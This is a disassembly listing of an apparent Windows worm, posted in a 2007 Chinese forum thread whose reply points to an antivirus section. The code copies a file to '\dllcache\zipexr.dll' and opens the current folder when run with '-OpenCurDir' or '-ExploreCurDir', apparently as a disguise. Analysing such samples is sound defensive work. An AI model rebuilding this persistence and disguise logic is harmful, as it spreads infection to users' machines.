:00401663 6D insd
:00401664 69782E65786500 imul edi, dword ptr [eax+2E], 00657865
:0040166B 5C pop esp
:0040166C 64 BYTE 064h
:0040166D 6C insb
:0040166E 6C insb
:0040166F 636163 arpl dword ptr [ecx+63], esp
:00401672 68655C7A69 push 697A5C65
:00401677 7065 jo 004016DE
:00401679 7872 js 004016ED
:0040167B 2E BYTE 02eh
:0040167C 64 BYTE 064h
:0040167D 6C insb
:0040167E 6C insb
:0040167F 00 BYTE 00h
* Referenced by a CALL at Address:
|:004013FA
|
:00401680 55 push ebp
:00401681 89E5 mov ebp, esp
:00401683 83EC18 sub esp, 00000018
:00401686 C744240404010000 mov [esp+04], 00000104
:0040168E C7042450514000 mov dword ptr [esp], 00405150
* Reference To: KERNEL32.GetSystemDirectoryA, Ord:018Ah
|
:00401695 E856210000 Call 004037F0
:0040169A 83EC08 sub esp, 00000008
:0040169D BAFFFFFFFF mov edx, FFFFFFFF
:004016A2 85C0 test eax, eax
:004016A4 0F84C2000000 je 0040176C
:004016AA C744240804010000 mov [esp+08], 00000104
:004016B2 C744240470534000 mov [esp+04], 00405370
:004016BA C7042400000000 mov dword ptr [esp], 00000000
* Reference To: KERNEL32.GetModuleFileNameA, Ord:014Dh
|
:004016C1 E83A210000 Call 00403800
:004016C6 83EC0C sub esp, 0000000C
:004016C9 BAFFFFFFFF mov edx, FFFFFFFF
:004016CE 85C0 test eax, eax
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00401660(C)
|
:004016D0 0F8496000000 je 0040176C
:004016D6 C744240470534000 mov [esp+04], 00405370
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00401677(C)
|
:004016DE C7042460524000 mov dword ptr [esp], 00405260
* Reference To: msvcrt.strcpy, Ord:029Bh
|
:004016E5 E8661F0000 Call 00403650
:004016EA 0FB60560524000 movzx eax, byte ptr [00405260]
:004016F1 31C9 xor ecx, ecx
:004016F3 31D2 xor edx, edx
:004016F5 84C0 test al, al
:004016F7 7417 je 00401710
:004016F9 8DB42600000000 lea esi, dword ptr [esi]
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:0040170E(C)
|
:00401700 3C5C cmp al, 5C
:00401702 746C je 00401770
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00401772(U)
|
:00401704 42 inc edx
:00401705 0FB68260524000 movzx eax, byte ptr [edx+00405260]
:0040170C 84C0 test al, al
:0040170E 75F0 jne 00401700
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:004016F7(C)
|
:00401710 C6816052400000 mov byte ptr [ecx+00405260], 00
:00401717 C744240450514000 mov [esp+04], 00405150
:0040171F C7042480544000 mov dword ptr [esp], 00405480
* Reference To: msvcrt.strcpy, Ord:029Bh
|
:00401726 E8251F0000 Call 00403650
:0040172B C74424045D164000 mov [esp+04], 0040165D
:00401733 C7042480544000 mov dword ptr [esp], 00405480
* Reference To: msvcrt.strcat, Ord:0297h
|
:0040173A E8011F0000 Call 00403640
:0040173F C744240450514000 mov [esp+04], 00405150
:00401747 C7042440504000 mov dword ptr [esp], 00405040
* Reference To: msvcrt.strcpy, Ord:029Bh
|
:0040174E E8FD1E0000 Call 00403650
* Possible StringData Ref from Code Obj ->"\dllcache\zipexr.dll"
|
:00401753 C74424046B164000 mov [esp+04], 0040166B
:0040175B C7042440504000 mov dword ptr [esp], 00405040
* Reference To: msvcrt.strcat, Ord:0297h
|
:00401762 E8D91E0000 Call 00403640
:00401767 BA01000000 mov edx, 00000001
* Referenced by a (U)nconditional or (C)onditional Jump at Addresses:
|:004016A4(C), :004016D0(C)
|
:0040176C C9 leave
:0040176D 89D0 mov eax, edx
:0040176F C3 ret
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00401702(C)
|
:00401770 89D1 mov ecx, edx
:00401772 EB90 jmp 00401704
:00401774 2D4F70656E sub eax, 6E65704F
:00401779 43 inc ebx
:0040177A 7572 jne 004017EE
:0040177C 44 inc esp
:0040177D 697200006F7065 imul esi, dword ptr [edx+00], 65706F00
:00401784 6E outsb
:00401785 002D4578706C add byte ptr [6C707845], ch
:0040178B 6F outsd
:0040178C 7265 jb 004017F3
:0040178E 43 inc ebx
:0040178F 7572 jne 00401803
:00401791 44 inc esp
:00401792 6972006578706C imul esi, dword ptr [edx+00], 6C707865
:00401799 6F outsd
:0040179A 7265 jb 00401801
:0040179C 00 BYTE 00h
:0040179D 8D BYTE 8dh
:0040179E 76 BYTE 76h
:0040179F 00 BYTE 00h
* Referenced by a CALL at Address:
|:00401405
|
:004017A0 55 push ebp
:004017A1 89E5 mov ebp, esp
:004017A3 81ECA8000000 sub esp, 000000A8
:004017A9 895DF4 mov dword ptr [ebp-0C], ebx
:004017AC 8B5D08 mov ebx, dword ptr [ebp+08]
:004017AF 8975F8 mov dword ptr [ebp-08], esi
:004017B2 897DFC mov dword ptr [ebp-04], edi
:004017B5 803B00 cmp byte ptr [ebx], 00
:004017B8 7516 jne 004017D0
* Referenced by a (U)nconditional or (C)onditional Jump at Addresses:
|:00401822(U), :004018B8(U)
|
:004017BA 8B5DF4 mov ebx, dword ptr [ebp-0C]
:004017BD B801000000 mov eax, 00000001
:004017C2 8B75F8 mov esi, dword ptr [ebp-08]
:004017C5 8B7DFC mov edi, dword ptr [ebp-04]
:004017C8 89EC mov esp, ebp
:004017CA 5D pop ebp
:004017CB C3 ret
:004017CC 8D742600 lea esi, dword ptr [esi]
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:004017B8(C)
|
:004017D0 C744240474174000 mov [esp+04], 00401774
:004017D8 891C24 mov dword ptr [esp], ebx
* Reference To: msvcrt._stricmp, Ord:019Bh
|
:004017DB E8901E0000 Call 00403670
:004017E0 85C0 test eax, eax
:004017E2 7540 jne 00401824
:004017E4 C6056352400000 mov byte ptr [00405263], 00
:004017EB C744241405000000 mov [esp+14], 00000005
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:0040178C(C)
|
:004017F3 C744241080174000 mov [esp+10], 00401780
:004017FB C744240C80174000 mov [esp+0C], 00401780
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:0040178F(C)
|
:00401803 C744240860524000 mov [esp+08], 00405260
* Possible StringData Ref from Code Obj ->"open"
|
:0040180B C744240481174000 mov [esp+04], 00401781
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:004018EC(U)
|
:00401813 C7042400000000 mov dword ptr [esp], 00000000
* Reference To: SHELL32.ShellExecuteA, Ord:008Dh
|
:0040181A E891220000 Call 00403AB0
:0040181F 83EC18 sub esp, 00000018
:00401822 EB96 jmp 004017BA
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:004017E2(C)
|
* Possible StringData Ref from Code Obj ->"-ExploreCurDir"
|
:00401824 C744240486174000 mov [esp+04], 00401786
:0040182C 891C24 mov dword ptr [esp], ebx
* Reference To: msvcrt._stricmp, Ord:019Bh
|
:0040182F E83C1E0000 Call 00403670
:00401834 85C0 test eax, eax
:00401836 0F8481000000 je 004018BD
:0040183C C744240422000000 mov [esp+04], 00000022
:00401844 8D7B01 lea edi, dword ptr [ebx+01]
:00401847 893C24 mov dword ptr [esp], edi
* Reference To: msvcrt.strchr, Ord:0298h
|
:0040184A E8D11D0000 Call 00403620
:0040184F 85C0 test eax, eax
:00401851 89C6 mov esi, eax
:00401853 7404 je 00401859
:00401855 C60000 mov byte ptr [eax], 00
:00401858 46 inc esi
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00401853(C)
|
:00401859 8D5D98 lea ebx, dword ptr [ebp-68]
:0040185C 891C24 mov dword ptr [esp], ebx
* Reference To: KERNEL32.GetStartupInfoA, Ord:0180h
|
:0040185F E84C1F0000 Call 004037B0
:00401864 C7459844000000 mov [ebp-68], 00000044
:0040186B 83EC04 sub esp, 00000004
:0040186E 8D5588 lea edx, dword ptr [ebp-78]
:00401871 89542424 mov dword ptr [esp+24], edx
:00401875 895C2420 mov dword ptr [esp+20], ebx
:00401879 C744241C00000000 mov [esp+1C], 00000000
:00401881 C744241800000000 mov [esp+18], 00000000
:00401889 C744241400000000 mov [esp+14], 00000000
:00401891 C744241000000000 mov [esp+10], 00000000
:00401899 C744240C00000000 mov [esp+0C], 00000000
:004018A1 C744240800000000 mov [esp+08], 00000000
:004018A9 89742404 mov dword ptr [esp+04], esi
:004018AD 893C24 mov dword ptr [esp], edi
* Reference To: KERNEL32.CreateProcessA, Ord:0054h
|
:004018B0 E80B1F0000 Call 004037C0
:004018B5 83EC28 sub esp, 00000028
:004018B8 E9FDFEFFFF jmp 004017BA
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00401836(C)
|
:004018BD C6056352400000 mov byte ptr [00405263], 00
:004018C4 C744241405000000 mov [esp+14], 00000005
:004018CC C744241080174000 mov [esp+10], 00401780
:004018D4 C744240C80174000 mov [esp+0C], 00401780
:004018DC C744240860524000 mov [esp+08], 00405260
* Possible StringData Ref from Code Obj ->"explore"
|
:004018E4 C744240495174000 mov [esp+04], 00401795
:004018EC E922FFFFFF jmp 00401813
:004018F1 55 push ebp
:004018F2 6E outsb
:004018F3 6B6E6F77 imul ebp, dword ptr [esi+6F], 00000077
:004018F7 6E outsb
:004018F8 50 push eax
:004018F9 726F jb 0040196A
:004018FB 636573 arpl dword ptr [ebp+73], esp
:004018FE 7300 jnb 00401900
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:004018FE(C)
|
:00401900 00000000000000000000 BYTE 10 DUP(0)
:0040190A 00000000000000000000 BYTE 10 DUP(0)
:00401914 00000000000000000000 BYTE 10 DUP(0)
:0040191E 00000000000000000000 BYTE 10 DUP(0)
:00401928 00000000000000000000 BYTE 10 DUP(0)
:00401932 00000000000000000000 BYTE 10 DUP(0)
:0040193C 00000000000000000000 BYTE 10 DUP(0)
:00401946 00000000000000000000 BYTE 10 DUP(0)
:00401950 00000000000000000000 BYTE 10 DUP(0)
:0040195A 00000000000000000000 BYTE 10 DUP(0)
:00401964 00000000000000000000 BYTE 10 DUP(0)
:0040196E 00000000000000000000 BYTE 10 DUP(0)
:00401978 00000000000000000000 BYTE 10 DUP(0)
:00401982 00000000000000000000 BYTE 10 DUP(0)
:0040198C 00000000000000000000 BYTE 10 DUP(0)
:00401996 00000000000000000000 BYTE 10 DUP(0)
:004019A0 00000000000000000000 BYTE 10 DUP(0)
:004019AA 00000000000000000000 BYTE 10 DUP(0)
:004019B4 00000000000000000000 BYTE 10 DUP(0)
:004019BE 00000000000000000000 BYTE 10 DUP(0)
:004019C8 00000000000000000000 BYTE 10 DUP(0)
:004019D2 00000000000000000000 BYTE 10 DUP(0)
:004019DC 00000000000000000000 BYTE 10 DUP(0)
:004019E6 00000000000000000000 BYTE 10 DUP(0)
:004019F0 0000000000 BYTE 5 DUP(0)
:004019F5 8D742600 lea esi, dword ptr [esi]
:004019F9 8DBC2700000000 lea edi, dword ptr [edi]
* Referenced by a CALL at Address:
|:00402B8A
|
:00401A00 55 push ebp
:00401A01 B83C110000 mov eax, 0000113C
:00401A06 89E5 mov ebp, esp
:00401A08 57 push edi
:00401A09 56 push esi
:00401A0A 53 push ebx
:00401A0B E8401B0000 call 00403550
:00401A10 0FB73DFD184000 movzx edi, word ptr [004018FD]
:00401A17 C7442408F5000000 mov [esp+08], 000000F5
:00401A1F 8B1DF1184000 mov ebx, dword ptr [004018F1]
:00401A25 C744240400000000 mov [esp+04], 00000000
:00401A2D 8B0DF5184000 mov ecx, dword ptr [004018F5]
:00401A33 8B15F9184000 mov edx, dword ptr [004018F9]
:00401A39 899DD8EEFFFF mov dword ptr [ebp+FFFFEED8], ebx
:00401A3F 0FB61DFF184000 movzx ebx, byte ptr [004018FF]
:00401A46 898DDCEEFFFF mov dword ptr [ebp+FFFFEEDC], ecx
:00401A4C 8D8DE7EEFFFF lea ecx, dword ptr [ebp+FFFFEEE7]
:00401A52 8995E0EEFFFF mov dword ptr [ebp+FFFFEEE0], edx
:00401A58 890C24 mov dword ptr [esp], ecx
:00401A5B 6689BDE4EEFFFF mov word ptr [ebp+FFFFEEE4], di
:00401A62 889DE6EEFFFF mov byte ptr [ebp+FFFFEEE6], bl
* Reference To: msvcrt.memset, Ord:027Ah
|
:00401A68 E8A31B0000 Call 00403610
:00401A6D C744240400100000 mov [esp+04], 00001000
:00401A75 8D95D4EEFFFF lea edx, dword ptr [ebp+FFFFEED4]
:00401A7B 89542408 mov dword ptr [esp+08], edx
:00401A7F 8D95E8EFFFFF lea edx, dword ptr [ebp+FFFFEFE8]
:00401A85 891424 mov dword ptr [esp], edx
* Reference To: PSAPI.EnumProcesses, Ord:0003h
|
:00401A88 E843150000 Call 00402FD0
:00401A8D 83EC0C sub esp, 0000000C
:00401A90 BAFFFFFFFF mov edx, FFFFFFFF
:00401A95 85C0 test eax, eax
:00401A97 747C je 00401B15
:00401A99 8BBDD4EEFFFF mov edi, dword ptr [ebp+FFFFEED4]
:00401A9F 31DB xor ebx, ebx
:00401AA1 C1EF02 shr edi, 02
:00401AA4 39FB cmp ebx, edi
:00401AA6 7360 jnb 00401B08
:00401AA8 90 nop
:00401AA9 8DB42600000000 lea esi, dword ptr [esi]
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00401B06(C)
|
:00401AB0 C744240400000000 mov [esp+04], 00000000
:00401AB8 8BB49DE8EFFFFF mov esi, dword ptr [ebp+4*ebx-00001018]
:00401ABF C7042410040000 mov dword ptr [esp], 00000410
:00401AC6 89742408 mov dword ptr [esp+08], esi |
楼主: yhl5202008
发表于 2007-1-13 22:17:13
楼主
发表于 2007-1-14 00:16:10
是一个软件,看反病毒区置顶帖子里有